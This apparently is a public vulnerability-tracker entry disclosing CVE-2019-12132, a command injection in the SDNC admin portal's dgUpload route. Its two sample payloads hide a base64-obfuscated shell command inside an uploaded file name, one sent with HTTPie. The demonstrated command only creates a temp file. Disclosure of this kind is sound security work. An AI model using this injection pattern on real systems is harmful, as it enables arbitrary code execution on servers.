Details
-
Sub-task
-
Status: Public disclosure
-
Highest
-
Resolution: Done
-
Casablanca Maintenance Release, Casablanca
-
CVE-2019-12132
-
-
OJSI-SDNC
-
SDNC El Alto Sprint 1
Description
SDNC allows any user/logged for arbitrary code execution in form.
Sample payload below.
Path: sdnc-oam/admportal/server/router/routes/sla.js:149
Url: http://<IP>:30201/sla/dgUpload
Exploit: touch '|| echo L3RtcC9kZ1VwbG9hZA== | base64 -d | xargs touch #'
Exploit: http -f 'http://<IP>:30201/sla/dgUpload' filename@||\ echo\ L3RtcC9kZ1VwbG9hZA\=\=\ |\ base64\ -d\ |\ xargs\ touch#
(requires HTTPie toolkit)